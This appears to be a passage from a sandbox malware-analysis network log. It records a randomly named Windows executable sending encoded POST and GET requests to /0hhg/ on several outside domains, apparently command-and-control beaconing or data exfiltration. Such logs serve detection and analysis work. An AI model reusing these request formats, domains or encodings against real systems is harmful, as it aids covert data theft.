                                                                                                    26 | 192.168.2.4 | 49763 | 188.116.38.155 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:39.551518917 CEST | 725 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.applesolve.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.applesolve.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=imtQaEN8dJz/gkayoS4PG2eedIRH1YnKS5f0y++bTXpSE3oPQ4M1k3EcI7Llg623zIWlGSWnu8FEe5URYJl/VuiCtLnCSHVHl+ED3+nFnLr/Et61xWXmP0Tewsl4HvM+CBHLmA/SlTBQcDTiz4cfZseNjgABYPX447dC6r+SNoKcj1jk2gHr0FK2PoXcTDA3N+JTBtu39WObydqQPj5cSJ0=
                                                                                                    May 2, 2024 08:26:40.109965086 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
                                                                                                    transfer-encoding: chunked
                                                                                                    content-encoding: br
                                                                                                    vary: Accept-Encoding
                                                                                                    date: Thu, 02 May 2024 06:26:38 GMT
                                                                                                    server: LiteSpeed


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    27 | 192.168.2.4 | 49764 | 188.116.38.155 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:42.273371935 CEST | 10807 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.applesolve.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.applesolve.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8= [TRUNCATED]
                                                                                                    May 2, 2024 08:26:42.849715948 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
                                                                                                    transfer-encoding: chunked
                                                                                                    content-encoding: br
                                                                                                    vary: Accept-Encoding
                                                                                                    date: Thu, 02 May 2024 06:26:41 GMT
                                                                                                    server: LiteSpeed


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    28 | 192.168.2.4 | 49765 | 188.116.38.155 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:44.991528034 CEST | 438 | OUT | GET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:45.416357994 CEST | 499 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-redirect-by: WordPress
                                                                                                    location: http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ
                                                                                                    content-length: 0
                                                                                                    date: Thu, 02 May 2024 06:26:44 GMT
                                                                                                    server: LiteSpeed


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    29 | 192.168.2.4 | 49766 | 108.186.8.158 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:52.319693089 CEST | 693 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=1N6ke2icSy5qQjibvIP6dxEdqnniCRuQSDtO/jp7hMvM3d42mRJjPykE0wr5LVUhdQ1F2DNE4Ke1u9xWSxRpuJRrr/72YDA0fh6atSErlrl4ne9Uyqw2PH3Ub55o/heClqgnA6I9aWQmvrzcW34p7T+8rnNlDSuGKKuQ8mjIgFARbxHLmxNr8zQV2zcEK9FpQA==
                                                                                                    May 2, 2024 08:26:52.857659101 CEST | 693 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=1N6ke2icSy5qQjibvIP6dxEdqnniCRuQSDtO/jp7hMvM3d42mRJjPykE0wr5LVUhdQ1F2DNE4Ke1u9xWSxRpuJRrr/72YDA0fh6atSErlrl4ne9Uyqw2PH3Ub55o/heClqgnA6I9aWQmvrzcW34p7T+8rnNlDSuGKKuQ8mjIgFARbxHLmxNr8zQV2zcEK9FpQA==
                                                                                                    May 2, 2024 08:26:53.014981031 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Encoding: gzip
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:26:52 GMT
                                                                                                    Connection: close


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    30 | 192.168.2.4 | 49767 | 108.186.8.158 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:56.266796112 CEST | 713 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:56.423480988 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Encoding: gzip
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:26:55 GMT
                                                                                                    Connection: close


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    31 | 192.168.2.4 | 49768 | 108.186.8.158 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:26:58.956283092 CEST | 10795 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:59.111953974 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Encoding: gzip
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:26:58 GMT
                                                                                                    Connection: close


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    32 | 192.168.2.4 | 49769 | 108.186.8.158 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:01.647504091 CEST | 434 | OUT | GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:01.803841114 CEST | 209 | IN | HTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:27:01 GMT
                                                                                                    Connection: close
                                                                                                    May 2, 2024 08:27:01.803896904 CEST | 813 | IN
                                                                                                    Data Ascii: 326<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = d


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    33 | 192.168.2.4 | 49770 | 91.195.240.19 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:16.299103022 CEST | 687 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dk48.lol
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.dk48.lol/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:16.474812031 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    34 | 192.168.2.4 | 49771 | 91.195.240.19 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:19.015899897 CEST | 707 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dk48.lol
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.dk48.lol/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:19.191505909 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    35 | 192.168.2.4 | 49772 | 91.195.240.19 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:21.727560043 CEST | 10789 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dk48.lol
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dk48.lol/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:21.902539015 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    36 | 192.168.2.4 | 49773 | 91.195.240.19 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:25.215449095 CEST | 432 | OUT | GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:25.390367031 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    37 | 192.168.2.4 | 49774 | 153.92.8.41 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:42.150662899 CEST | 711 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+guGNJyZA+AEWFUNPfbojZ1H6PpVhv0YeDj0sPdr2aJTiNLOoHtx6b5WE7UF0xhZyMy95Z2wYB+MZcJShQqBGkq+aU0LYz/I/Sda7EFLvsCLMrzR6vi1PpBXG3fq5U7iYqwSLFgc6lRHCicv2iZlzLZlo5m9yrtKfE8H+S4rxr9olys2Mf5qb65A==
                                                                                                    May 2, 2024 08:27:42.998332024 CEST | 711 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+guGNJyZA+AEWFUNPfbojZ1H6PpVhv0YeDj0sPdr2aJTiNLOoHtx6b5WE7UF0xhZyMy95Z2wYB+MZcJShQqBGkq+aU0LYz/I/Sda7EFLvsCLMrzR6vi1PpBXG3fq5U7iYqwSLFgc6lRHCicv2iZlzLZlo5m9yrtKfE8H+S4rxr9olys2Mf5qb65A==
                                                                                                    May 2, 2024 08:27:43.348754883 CEST | 1069 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:43 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    38 | 192.168.2.4 | 49775 | 153.92.8.41 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:45.026424885 CEST | 731 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+goW9Jhq4+HkWGXNPfSIjd1H2PpUU0zr6DiVcPeq2aEziNFuoIwh6c5WBMUEYxhYSMy9JZ2HsGssZSPSgWkhGkq+aU0LcN/InSdqrEX+DtLrM0kh6v1lPtBXGFfrkJ7gwqwXvFjIWmYHDISP3QWkeOYgda47e1taKkwhvIpaQ8voBBxxFr0pmziGcnvGvVF8bX1Pu4kz322vw=
                                                                                                    May 2, 2024 08:27:45.374144077 CEST | 1069 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:45 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    39 | 192.168.2.4 | 49776 | 153.92.8.41 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    May 2, 2024 08:27:47.900913954 CEST | 10813 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:48.241857052 CEST | 1069 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:48 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    40 | 192.168.2.4 | 49777 | 153.92.8.41 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
